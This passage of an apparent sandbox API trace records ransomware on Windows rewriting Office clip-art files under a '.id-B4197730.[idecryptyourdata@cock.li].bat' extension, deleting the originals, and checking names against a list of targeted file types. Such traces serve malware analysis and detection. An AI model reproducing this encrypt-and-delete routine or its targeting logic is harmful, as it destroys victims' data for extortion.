lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.971] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.971] SetEndOfFile (hFile=0x358) returned 1 [0061.971] CloseHandle (hObject=0x358) returned 1 [0061.972] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.972] SetEndOfFile (hFile=0x350) returned 1 [0061.972] CloseHandle (hObject=0x350) returned 1 [0061.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.973] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an00932_.wmf")) returned 1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString=".doc") returned 4 [0061.974] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString=".docx") returned 5 [0061.974] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.974] lstrlenW (lpString=".pdf") returned 4 [0061.974] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString=".xls") returned 4 [0061.974] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.974] lstrlenW (lpString=".xlsx") returned 5 [0061.974] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.974] lstrlenW (lpString=".ppt") returned 4 [0061.974] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString=".zip") returned 4 [0061.974] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.974] lstrlenW (lpString=".rar") returned 4 [0061.974] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString=".bz2") returned 4 [0061.974] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString=".7z") returned 3 [0061.974] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString=".dbf") returned 4 [0061.974] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString=".1cd") returned 4 [0061.974] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString=".jpg") returned 4 [0061.974] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.975] lstrlenW (lpString=".doc") returned 4 [0061.975] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString=".docx") returned 5 [0061.975] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.975] lstrlenW (lpString=".pdf") returned 4 [0061.975] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString=".xls") returned 4 [0061.975] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.975] lstrlenW (lpString=".xlsx") returned 5 [0061.975] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.975] lstrlenW (lpString=".ppt") returned 4 [0061.975] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.975] lstrlenW (lpString=".zip") returned 4 [0061.975] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.975] lstrlenW (lpString=".rar") returned 4 [0061.975] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString=".bz2") returned 4 [0061.975] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString=".7z") returned 3 [0061.975] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.975] lstrlenW (lpString=".dbf") returned 4 [0061.975] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.975] lstrlenW (lpString=".1cd") returned 4 [0061.975] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.975] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN00932_.WMF") returned 68 [0061.975] lstrlenW (lpString=".jpg") returned 4 [0061.975] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.975] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.975] lstrlenW (lpString="AN01039_.WMF") returned 12 [0061.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.976] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=3344) returned 1 [0061.976] CloseHandle (hObject=0x350) returned 1 [0061.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 0x220 [0061.976] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0061.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.976] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.976] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0061.976] GetLastError () returned 0x0 [0061.977] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0xd10, lpOverlapped=0x0) returned 1 [0061.991] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xd20, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xd20, lpOverlapped=0x0) returned 1 [0061.992] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0061.992] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0061.992] SetEndOfFile (hFile=0x358) returned 1 [0061.992] CloseHandle (hObject=0x358) returned 1 [0061.993] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0061.993] SetEndOfFile (hFile=0x350) returned 1 [0061.994] CloseHandle (hObject=0x350) returned 1 [0061.994] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0061.994] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01039_.wmf")) returned 1 [0061.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.994] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.994] lstrlenW (lpString=".doc") returned 4 [0061.994] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.994] lstrlenW (lpString=".docx") returned 5 [0061.994] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.995] lstrlenW (lpString=".pdf") returned 4 [0061.995] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString=".xls") returned 4 [0061.995] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.995] lstrlenW (lpString=".xlsx") returned 5 [0061.995] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.995] lstrlenW (lpString=".ppt") returned 4 [0061.995] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.995] lstrlenW (lpString=".zip") returned 4 [0061.995] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.995] lstrlenW (lpString=".rar") returned 4 [0061.995] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString=".bz2") returned 4 [0061.995] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString=".7z") returned 3 [0061.995] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.995] lstrlenW (lpString=".dbf") returned 4 [0061.995] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.995] lstrlenW (lpString=".1cd") returned 4 [0061.995] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.995] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.995] lstrlenW (lpString=".jpg") returned 4 [0061.995] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString=".doc") returned 4 [0061.996] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString=".docx") returned 5 [0061.996] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0061.996] lstrlenW (lpString=".pdf") returned 4 [0061.996] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString=".xls") returned 4 [0061.996] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0061.996] lstrlenW (lpString=".xlsx") returned 5 [0061.996] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0061.996] lstrlenW (lpString=".ppt") returned 4 [0061.996] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString=".zip") returned 4 [0061.996] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0061.996] lstrlenW (lpString=".rar") returned 4 [0061.996] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString=".bz2") returned 4 [0061.996] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString=".7z") returned 3 [0061.996] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString=".dbf") returned 4 [0061.996] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString=".1cd") returned 4 [0061.996] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0061.996] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01039_.WMF") returned 68 [0061.996] lstrlenW (lpString=".jpg") returned 4 [0061.996] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0061.997] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0061.997] lstrlenW (lpString="AN01084_.WMF") returned 12 [0061.997] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0061.997] GetFileSizeEx (in: hFile=0x350, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=1832) returned 1 [0061.997] CloseHandle (hObject=0x350) returned 1 [0062.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf")) returned 0x220 [0062.000] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x350 [0062.001] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.001] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.001] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0062.001] GetLastError () returned 0x0 [0062.001] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x728, lpOverlapped=0x0) returned 1 [0062.008] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x730, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x730, lpOverlapped=0x0) returned 1 [0062.009] ReadFile (in: hFile=0x350, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.009] WriteFile (in: hFile=0x358, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.010] SetEndOfFile (hFile=0x358) returned 1 [0062.010] CloseHandle (hObject=0x358) returned 1 [0062.010] SetFilePointerEx (in: hFile=0x350, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.010] SetEndOfFile (hFile=0x350) returned 1 [0062.011] CloseHandle (hObject=0x350) returned 1 [0062.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.012] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01084_.wmf")) returned 1 [0062.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.012] lstrlenW (lpString=".doc") returned 4 [0062.012] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.012] lstrlenW (lpString=".docx") returned 5 [0062.012] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.012] lstrlenW (lpString=".pdf") returned 4 [0062.012] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.012] lstrlenW (lpString=".xls") returned 4 [0062.012] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.012] lstrlenW (lpString=".xlsx") returned 5 [0062.012] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.012] lstrlenW (lpString=".ppt") returned 4 [0062.012] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.012] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.012] lstrlenW (lpString=".zip") returned 4 [0062.012] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.012] lstrlenW (lpString=".rar") returned 4 [0062.012] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.012] lstrlenW (lpString=".bz2") returned 4 [0062.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString=".7z") returned 3 [0062.013] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString=".dbf") returned 4 [0062.013] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString=".1cd") returned 4 [0062.013] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString=".jpg") returned 4 [0062.013] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString=".doc") returned 4 [0062.013] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString=".docx") returned 5 [0062.013] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.013] lstrlenW (lpString=".pdf") returned 4 [0062.013] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString=".xls") returned 4 [0062.013] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.013] lstrlenW (lpString=".xlsx") returned 5 [0062.013] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.013] lstrlenW (lpString=".ppt") returned 4 [0062.013] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.013] lstrlenW (lpString=".zip") returned 4 [0062.013] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.013] lstrlenW (lpString=".rar") returned 4 [0062.013] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString=".bz2") returned 4 [0062.013] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.013] lstrlenW (lpString=".7z") returned 3 [0062.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.014] lstrlenW (lpString=".dbf") returned 4 [0062.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.014] lstrlenW (lpString=".1cd") returned 4 [0062.014] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01084_.WMF") returned 68 [0062.014] lstrlenW (lpString=".jpg") returned 4 [0062.014] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.014] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.014] lstrlenW (lpString="AN01174_.WMF") returned 12 [0062.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0062.015] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x268ff14 | out: lpFileSize=0x268ff14*=27858) returned 1 [0062.015] CloseHandle (hObject=0x358) returned 1 [0062.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf")) returned 0x220 [0062.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x368 [0062.016] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.016] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x268fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN01174_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an01174_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0062.017] GetLastError () returned 0x0 [0062.017] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x6cd2, lpOverlapped=0x0) returned 1 [0062.035] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0x6ce0, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0x6ce0, lpOverlapped=0x0) returned 1 [0062.036] ReadFile (in: hFile=0x368, lpBuffer=0x413b020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x268fecc, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesRead=0x268fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.036] WriteFile (in: hFile=0x370, lpBuffer=0x413b020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x268fc94, lpOverlapped=0x0 | out: lpBuffer=0x413b020*, lpNumberOfBytesWritten=0x268fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.036] SetEndOfFile (hFile=0x370) returned 1 [0062.036] CloseHandle (hObject=0x370) returned 1 [0062.037] SetFilePointerEx (in: hFile=0x368, 